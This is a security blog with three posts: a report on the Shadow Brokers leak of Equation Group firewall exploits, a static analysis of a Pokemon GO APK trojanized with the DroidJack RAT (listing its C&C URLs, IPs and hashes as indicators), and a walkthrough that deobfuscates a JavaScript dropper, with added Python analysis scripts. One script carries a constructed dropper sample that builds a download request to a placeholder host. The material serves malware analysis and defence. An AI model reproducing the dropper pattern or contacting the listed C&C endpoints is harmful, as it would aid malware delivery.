Monday, 22 August 2016


Hackers Vs Hackers - Equation Group's Cyber Weapon Leaked




One week ago a new paste titled "Equation Group - Cyber Weapons Auction" was posted on the Pastebin website.


This paste appears to have been published by a group of hackers called the Shadow Brokers. The group claims to have attack tools and exploits that are probably attributable to the hacker group known as the "Equation Group", which is likely linked to the NSA.
Data, including exploits and hacking tools, were published on their GitHub and Tumblr accounts, but the accounts were promptly suspended. The data links to two distinct PGP-encrypted archives.

According to the information published by Edward Snowden, the USA is responsible for these attacks.


In the leak, we found links to some of the hacking tool names used in the documents leaked by Edward Snowden, such as "BANANAGLEE" and "EPICBANANA".

Since 2001, the Equation Group has infected thousands of victims in over 30 countries worldwide, across every sector: government and diplomatic institutions, telecommunications, aerospace, energy, nuclear research, the oil and gas industry, the military, etc.

Last Friday, The Intercept published a new set of documents from the Edward Snowden archive. These documents confirm that the files leaked by the Shadow Brokers contain authentic NSA software and hacking tools used to secretly infect computers worldwide.

Archive Analysis

The archive contains two files:
  • eqgrp-free-file.xz.gpg: the Shadow Brokers released the password for free, as evidence of the leak.
  • eqgrp-auction-file.xz.gpg: the Shadow Brokers are auctioning off the password for this archive (they are asking for 1 million bitcoins to release the cyber weapons and more files belonging to the Equation Group's arsenal).

Extracting the free archive in my Windows lab, my AV immediately triggered three warnings about three trojan horses:
  • egregiousblunder_3.0.0.1
  • workit.py
  • ELBA (a compiled version of ELBA.sh)
To avoid having my lab compromised, I decided to switch to my Linux lab and extract the archive there.

The freely distributed archive contains only a small amount of information, which does not directly prove that the data belongs to the Equation Group.

The exploits appear to be targeting firewalls, particularly Cisco PIX/ASA, Juniper Netscreen, Fortigate, and more.

Checking the files, it is possible to identify "extrabacon_1.1.0.1", a Python file containing a cascade of if-else statements that checks the Cisco appliance version.

The image below reports the shellcode files for each Cisco ASA version.

The ExtraBacon exploit uses a zero-day vulnerability (CVE-2016-6366) that affects the code in Cisco ASA software that handles the Simple Network Management Protocol (SNMP).
This vulnerability could allow an unauthenticated remote attacker to cause a reboot of the system (quoting the Cisco advisory).

American security firms such as Cisco, Fortinet and Juniper, and also a Chinese firm, TopSec, have released patches to fix these vulnerabilities.


If everything is true, we are officially in a cyber war!!

Thursday, 21 July 2016

Monday, 18 July 2016


Pokemon GO evolves in Malware GO - Part 1


As reported by different sources, Pokemon Go is a virtual reality game and also the first game developed by Nintendo for Android and iOS smartphones.

Researchers discovered an infected Android version of the mobile game Pokemon GO. The installation file (APK) was modified to include a malicious remote access tool (RAT) called DroidJack, which would give an attacker full control over a victim's phone. The game was first released in Australia and New Zealand on July 4th and in the US on July 6th.

Since the game had not been officially released worldwide at the same time, many gamers wishing to access it before it was released in their country attempted to download a copy outside of legitimate channels.


PART 1 - STATIC ANALYSIS


In the first part of this article I want to do a deep-dive analysis of the evil APK and compare the differences between the real and the infected app.

Whoever created the evil app retrieved a copy of the game, inserted a RAT tool inside it and spread the APK on different third-party markets. The attacker took advantage of the rest of the world's frenzy to play the game before it was officially released in their countries.


HERE WE GOOOOOOO!!!!


First of all, I think it is important to analyze the differences between the PERMISSIONs included in the Manifest file.

The red square highlights part of the permissions added to the evil APK.

The user, by accepting these permissions, gives the attacker full access to his SMS, contact list, camera, microphone, internal and external (SD card) storage, etc.

Further evidence is shown in the image below. The green square contains the legitimate part of the APK; the red square shows the padded-in code, where different DroidJack server services are declared so they can be enabled.
In the same part it is possible to read the declaration of two activities, CamSnapDJ and VideoSnapDJ.
Two receivers are also declared:
  • Connector, to run on boot completed
  • CallListener, to read the phone state
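The comparison of permissions and components between the clean and the infected manifest can be automated. The following Python script is an added example, not code from the post or from the DroidJack sample: it parses two constructed AndroidManifest.xml fragments (the com.example package names and the exact permission set are placeholders, only the CamSnapDJ, VideoSnapDJ, Connector and CallListener component names come from the post), reports everything the trojanized manifest declares that the clean one does not, maps each added permission to the capability it grants, and lists receivers hooked to BOOT_COMPLETED.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = "{%s}name" % ANDROID_NS  # ElementTree spells android:name this way

# Constructed manifests: a stripped-down legitimate game and the same game with a
# RAT grafted in. Package names under com.example are placeholders, not the real ones.
CLEAN_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.game">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <application android:label="Game">
    <activity android:name="com.example.game.MainActivity"/>
    <service android:name="com.example.game.SyncService"/>
  </application>
</manifest>"""

TROJANIZED_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.game">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Game">
    <activity android:name="com.example.game.MainActivity"/>
    <service android:name="com.example.game.SyncService"/>
    <activity android:name="com.example.rat.CamSnapDJ"/>
    <activity android:name="com.example.rat.VideoSnapDJ"/>
    <service android:name="com.example.rat.ConnectorService"/>
    <receiver android:name="com.example.rat.Connector">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <receiver android:name="com.example.rat.CallListener">
      <intent-filter><action android:name="android.intent.action.PHONE_STATE"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

# What each added permission hands to whoever controls the app.
SENSITIVE = {
    "android.permission.READ_SMS": "read stored SMS",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS",
    "android.permission.SEND_SMS": "send SMS (premium-rate fraud, 2FA relay)",
    "android.permission.READ_CONTACTS": "dump the contact list",
    "android.permission.RECORD_AUDIO": "use the microphone",
    "android.permission.CAMERA": "use the camera",
    "android.permission.WRITE_EXTERNAL_STORAGE": "read/write the SD card",
    "android.permission.READ_PHONE_STATE": "read IMEI, phone number, call state",
    "android.permission.RECEIVE_BOOT_COMPLETED": "start automatically at boot",
}

COMPONENT_TAGS = {"activity": "activities", "service": "services", "receiver": "receivers"}


def summarize_manifest(xml_text):
    """Return the declared permissions and components of one manifest as sets."""
    root = ET.fromstring(xml_text)
    summary = {"permissions": set(), "activities": set(), "services": set(), "receivers": set()}
    for el in root.iter("uses-permission"):
        summary["permissions"].add(el.get(NAME))
    for tag, key in COMPONENT_TAGS.items():
        for el in root.iter(tag):
            summary[key].add(el.get(NAME))
    return summary


def diff_manifests(clean_xml, suspect_xml):
    """Everything the suspect manifest declares that the clean one does not."""
    clean, suspect = summarize_manifest(clean_xml), summarize_manifest(suspect_xml)
    return {key: sorted(suspect[key] - clean[key]) for key in clean}


def flag_sensitive(permissions):
    """Map added permissions to the capability they grant, skipping benign ones."""
    return {p: SENSITIVE[p] for p in permissions if p in SENSITIVE}


def boot_receivers(xml_text):
    """Receivers wired to BOOT_COMPLETED: the usual persistence hook for a RAT."""
    root = ET.fromstring(xml_text)
    found = []
    for rcv in root.iter("receiver"):
        actions = {a.get(NAME) for a in rcv.iter("action")}
        if "android.intent.action.BOOT_COMPLETED" in actions:
            found.append(rcv.get(NAME))
    return found


if __name__ == "__main__":
    added = diff_manifests(CLEAN_MANIFEST, TROJANIZED_MANIFEST)
    for key, items in added.items():
        print("added %s: %s" % (key, ", ".join(items) or "(none)"))
    for perm, capability in flag_sensitive(added["permissions"]).items():
        print("  !! %s -> %s" % (perm, capability))
    print("boot persistence:", boot_receivers(TROJANIZED_MANIFEST))
```

On a real APK the same functions work on the AndroidManifest.xml produced by apktool (the binary manifest inside the APK must be decoded first); comparing against the manifest of the official store build is what turns "many permissions" into "these permissions were added".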

Inspecting the contents of both APK files, it stands out that three different packages were added by the attacker.


DroidJack is also known as SandroRAT; the evidence is reported below:


The attacker used the Java Crypto library to encrypt communications with the AES (Advanced Encryption Standard) algorithm.

Source: https://docs.oracle.com/javase/7/docs/api/javax/crypto/Cipher.html

I was able to decode the key from the byte array.
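Recovering a key from a decompiled byte array is mostly a matter of handling Java's signed byte literals correctly. The Python helper below is an added example, not the author's tooling or anything from the DroidJack code: it works on a constructed decompiled-Java fragment (the Crypt class, the KEY values and the ECB transformation are invented for the example and are not the sample's key), converts each literal to the unsigned byte the key actually consists of, checks the length against the valid AES key sizes, and lists the transformation strings passed to Cipher.getInstance() so a weak mode like ECB is spotted at the same time.

```python
import re

# Constructed fragment in the shape a decompiler emits for a hard-coded key. The byte
# values and the cipher mode are invented for this example and are not from the sample.
DECOMPILED_JAVA = """
public class Crypt {
    private static final byte[] KEY = new byte[]{ 77, -120, 0, 127, -1, 64, 12, -99, 33, 5, 100, -7, 8, 9, (byte) 0xA0, 11 };
    public static byte[] enc(byte[] data) throws Exception {
        SecretKeySpec spec = new SecretKeySpec(KEY, "AES");
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, spec);
        return c.doFinal(data);
    }
}
"""

ARRAY_RE = re.compile(r'byte\[\]\s+(\w+)\s*=\s*new\s+byte\[\]\s*\{([^}]*)\}')
LITERAL_RE = re.compile(r'-?0[xX][0-9a-fA-F]+|-?\d+')
CIPHER_RE = re.compile(r'Cipher\.getInstance\(\s*"([^"]+)"\s*\)')
AES_KEY_SIZES = (16, 24, 32)


def java_byte_literals_to_bytes(body):
    """Java byte literals are signed (-128..127) and hex ones are usually written
    as (byte) 0xNN; fold both onto the 0..255 range a key actually consists of."""
    out = bytearray()
    for tok in LITERAL_RE.findall(body):
        value = int(tok, 0)
        if not -128 <= value <= 255:
            raise ValueError("not a byte literal: %s" % tok)
        out.append(value & 0xFF)  # -120 -> 0x88, -1 -> 0xff, 0xA0 stays 0xa0
    return bytes(out)


def extract_keys(java_src):
    """Every byte[] literal in the source, keyed by its Java variable name."""
    return {name: java_byte_literals_to_bytes(body) for name, body in ARRAY_RE.findall(java_src)}


def key_report(key):
    """Length check against the valid AES sizes plus the hex form a decrypt tool takes."""
    return {
        "length": len(key),
        "valid_aes_size": len(key) in AES_KEY_SIZES,
        "hex": key.hex(),
    }


def cipher_transformations(java_src):
    """Transformation strings handed to Cipher.getInstance(); ECB is flagged because
    it leaks plaintext structure and gives no integrity protection."""
    return [(t, "/ECB/" in t.upper()) for t in CIPHER_RE.findall(java_src)]


if __name__ == "__main__":
    for name, key in extract_keys(DECOMPILED_JAVA).items():
        print(name, key_report(key))
    for transformation, is_ecb in cipher_transformations(DECOMPILED_JAVA):
        print(transformation, "(ECB, weak)" if is_ecb else "")
```

The same regexes run unchanged over the output of jadx or JD-GUI; a key that decodes to a valid AES length and sits next to a Cipher.getInstance() call is what makes the C&C traffic of a sample like this decryptable offline.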


Below are reported the URL contacted and the port used to communicate with the C&Cs.



This malware identifies the device and creates a database to store this information. Then everything is sent to the website http://droidjack(dot)net/storeReport(dot)php.

In the class bs the attacker verifies whether the device is rooted by checking for the existence of the APK file Superuser.apk in the folder /system/app/.

If the smartphone is rooted, this malware will have full control of the device.



The image below reports how this malware monitors and stores information about incoming, outgoing and draft SMS messages.



In the last picture I reported how the WhatsApp database is read and stolen.




Finally, this report shows how third-party markets that give you the opportunity to download APKs for free can spread malicious apps. To protect yourself from possible infections, download apps from the official app store and not from third-party sites.


There's no such thing as a free lunch!!


IOC:

SHA256: 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4
MD5: d350cc8222792097317608ea95b283a8
Domain: 
  • http://pokemon.no-ip.org (IP address: 88.223.178.130)
  • http://droidjack.net/storeReport.php (IP: 162.251.80.24)


Dynamic analysis is coming soon...


Thursday, 7 July 2016


JS Dropper Galaxy

The wonderful ways to obfuscate JavaScript Dropper




Malware analysis and code reverse engineering is one of my passions in the security field.

Today I'd like to show two wonderful ways to obfuscate a JavaScript file in order to complicate code analysis.

I analyzed the same phishing campaign (based on the e-mail's subject) that spreads two different JavaScript droppers.

As usual, the author tries to lure the user using double file extensions.


The first is the following:

This file is well obfuscated, and only a dynamic analysis helps you understand which actions it will perform during its execution.

The second is the following:

JavaScript Obfuscated Code - Part  1
JavaScript Obfuscated Code - Part 2
This JavaScript gives me evidence that whoever created it is not very expert in code development and obfuscation.

The trick used to obfuscate this file is to create a lot of functions, each holding an array filled with random numbers and only one position with text or a single char; when invoked, the function returns a specific position, which is the only char present in the array. (See Part 1)

The second part shows how whoever created this file invoked several of these functions, each at its specific array position, in order to rebuild the URL and the other objects ("Scripting.FileSystemObject", "ADODB.Stream", "MSXML2.XMLHTTP") used for evil purposes.
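Because every helper returns one fixed array element, this scheme can be undone statically without ever running the dropper. The Python script below is an added example, not the author's tool or the campaign's code: it runs on a constructed JavaScript sample written in the style just described (the k1..k8 helper names and the dropper-host.invalid hostname are placeholders, the three object names are the ones quoted above), maps each helper to the string it returns, strips the helper definitions, inlines each call as a string literal, and folds the "a"+"b" concatenations back into the original strings.

```python
import ast
import json
import re

# Constructed sample in the style described above: each helper holds an array of junk
# numbers with one string element and returns only that element; the real logic then
# concatenates helper calls. The hostname is a placeholder, not the campaign's URL.
SAMPLE_JS = r'''
function k1(){var z=[17,"S",42,9];return z[1];}
function k2(){var z=["c",3,88];return z[0];}
function k3(){var z=[5,5,"ripting.FileSystemObject"];return z[2];}
function k4(){var z=[1,"A",7,7,7];return z[1];}
function k5(){var z=[64,"DODB.Stream",2];return z[1];}
function k6(){var z=["MSXML2.XMLHTTP",0];return z[0];}
function k7(){var z=[9,9,"http://",9];return z[2];}
function k8(){var z=["dropper-host.invalid/p.exe",31,31];return z[0];}
var fso = new ActiveXObject(k1()+k2()+k3());
var stm = new ActiveXObject(k4()+k5());
var req = new ActiveXObject(k6());
req.open("GET", k7()+k8(), false);
'''

# function NAME(){ var ARR=[...]; return ARR[IDX]; }
HELPER_RE = re.compile(
    r'function\s+(\w+)\s*\(\)\s*\{\s*var\s+(\w+)\s*=\s*\[(.*?)\]\s*;'
    r'\s*return\s+\2\[(\d+)\]\s*;\s*\}', re.S)
# array elements: double- or single-quoted strings, or numbers
ELEMENT_RE = re.compile(r'''"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|-?\d+(?:\.\d+)?''')
CALL_RE = re.compile(r'\b(\w+)\(\)')
CONCAT_RE = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"')


def parse_js_array(body):
    """Parse a flat JS array literal of numbers and quoted strings."""
    return [ast.literal_eval(tok) for tok in ELEMENT_RE.findall(body)]


def collect_helpers(js):
    """Map each helper function name to the string it returns."""
    table = {}
    for name, _, array_body, index in HELPER_RE.findall(js):
        value = parse_js_array(array_body)[int(index)]
        if isinstance(value, str):
            table[name] = value
    return table


def deobfuscate(js):
    """Drop the helper definitions, inline each call as a string literal, then fold
    adjacent "a"+"b" concatenations so the original strings become readable."""
    table = collect_helpers(js)
    code = HELPER_RE.sub("", js)
    code = CALL_RE.sub(lambda m: json.dumps(table[m.group(1)]) if m.group(1) in table else m.group(0), code)
    while True:
        folded = CONCAT_RE.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), code)
        if folded == code:
            return code.strip()
        code = folded


def recovered_strings(js):
    """All string literals visible after de-obfuscation: objects, URLs, paths."""
    return [m.group(0)[1:-1] for m in re.finditer(r'"(?:[^"\\]|\\.)*"', deobfuscate(js))]


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_JS))
    print("IOC candidates:", recovered_strings(SAMPLE_JS))
```

The recovered strings are exactly the indicators worth keeping from such a dropper (COM objects used, download URL, drop path), and the fold loop terminates because each pass strictly shortens the code or leaves it unchanged.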

Below I am reporting two images that show the de-obfuscated JavaScript code. Reading it, you can see which objects will be invoked in your OS when the JS file is executed, which URL will be contacted, and in which folder the evil files will be stored on your computer.

No dynamic analysis is necessary to understand which actions this JavaScript will perform and which URL will be requested.

JavaScript De-obfuscated Code - Part 1
JavaScript De-obfuscated Code - Part 2

The same campaign, two different files...?!?!